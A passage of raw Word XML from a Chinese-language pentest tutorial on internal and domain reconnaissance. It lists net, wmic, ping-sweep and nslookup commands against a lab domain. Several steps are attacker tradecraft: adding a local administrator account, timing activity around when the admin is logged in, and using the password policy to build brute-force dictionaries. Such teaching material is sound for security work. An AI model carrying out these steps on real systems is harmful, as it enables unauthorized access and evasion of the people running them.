          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">net user </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="1271270"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1271270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>net user &lt;username&gt; //查看指定用户信息</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>net localgroup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5402580" cy="2727960"/>
            <wp:effectExtent l="0" t="0" r="7620"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22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5402580" cy="2727960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>net localgroup &lt;groupname&gt; //查看指定组信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 执行以下命令可以在目标本地创建一个新的用户并加入本地管理员组。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>net user &lt;username&gt; &lt;password&gt; /add</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>net localgroup administrators &lt;username&gt; /add</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="16"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="X93be5421a80ac339e23c9f5be36c0bae0a96509"/>
      <w:r>
        <w:t>16、查看当前登录的用户</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>query user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 可以用来分析目标主机管理员的登录时间，从而避开。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5485765" cy="619760"/>
            <wp:effectExtent l="0" t="0" r="635" b="508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23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5485765" cy="619760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:bookmarkEnd w:id="17"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="二域内基础信息搜集"/>
      <w:r>
        <w:t>二、域内基础信息搜集</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="X780006c77df178a0789efdf673bf6fbb7ca0d2d"/>
      <w:r>
        <w:t>1、判断是否存在域环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>net config workstation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5484495" cy="2818130"/>
            <wp:effectExtent l="0" t="0" r="190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484495" cy="2818130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="19"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="Xfb26b67ec759365cc867814b94d903fe45993c9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>、查看域用户信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>net user /domain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="1505585"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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5486400" cy="1505585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">net user &lt;username&gt; /domain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//查看指定域用户信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>wmic useraccount get Caption, Domain, Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 获取所有用户的SID，所属域和用户描述信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="1130300"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270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5486400" cy="1130300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="X4c88e053f2413bc0062e1546f480b701de9093b"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>、查看域用户组信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>net group /domain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5074920" cy="3307080"/>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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5074920" cy="3307080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>net group "Domain Admins" /domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//查看域管理员组</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">net group "Domain Computers" /domain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//查看域成员主机组</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="29"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2227"/>
        <w:gridCol w:w="3816"/>
      </w:tblGrid>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>域组名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Domain Admins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>域管理员组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Domain Computers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>域成员主机组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Domain Controllers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>域控制器组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Domain Guests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>域来宾组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Domain Users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>域用户组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Enterprise Admins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>企业系统管理员组，适用域林范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="21"/>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="X780894e7796857510ffecea3e72a1e8921312aa"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>、查看域内密码策略</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>net accounts /domain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4671060" cy="2065020"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4671060" cy="2065020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 测试人员可以根据密码策略构造字典，并发起爆破攻击。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="X8c83603f48c6ed6d2f63231193da5a449f61b8a"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、查看域控制器 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>net group "Domain Controllers" /domain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5485130" cy="1751330"/>
            <wp:effectExtent l="0" t="0" r="1270" b="127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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5485130" cy="1751330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>net time /domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//主域控会被用作时间服务器，查询时间服务器便能找到主域控的名称</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3924300" cy="777240"/>
            <wp:effectExtent l="0" t="0" r="762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3924300" cy="777240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="X0b7d15583201b9d9f4d7dc27442ec758d3d7d9f"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>、定位域控IP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">ping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DC.kele.lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>为域控制器的主机名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4754880" cy="1973580"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4754880" cy="1973580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>得</w:t>
      </w:r>
      <w:r>
        <w:t>到目标主机的主机名后，可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>直接</w:t>
      </w:r>
      <w:r>
        <w:t>对主机名执行ping命令，根据执行返回的内容便可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>知道</w:t>
      </w:r>
      <w:r>
        <w:t>域控的IP地址。除此之外，域控往往在域内同时被用作DNS服务器，因此找到当前主机的DNS服务器便能定位域控。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>nslookup kele.lab</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24300" cy="1800225"/>
            <wp:effectExtent l="0" t="0" r="7620" b="13335"/>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32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3924300" cy="1800225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="18"/>
    <w:bookmarkEnd w:id="24"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="三内网资源探测"/>
      <w:r>
        <w:t>三、内网资源探测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="X322ec38d53d92a186b702a0e4e92c60fb756cc3"/>
      <w:r>
        <w:t>1、内网存活主机发现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="X8e7dcf2aba6b9cf87ce45dfb0f9dceffb237a8f"/>
      <w:r>
        <w:t>(1)、基于ICMP发现存活主机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 通过ICMP循环对整个网段的每个IP执行ping命令，能ping通的IP地址即为存活主机。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>for /L %I in (1,1,254) DO @ping -w 1 -n 1 10.0.0.%I | findstr "TTL="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//Windows</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>for k in $( seq 1 255);do ping -c 1 192.168.7.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:drawing>
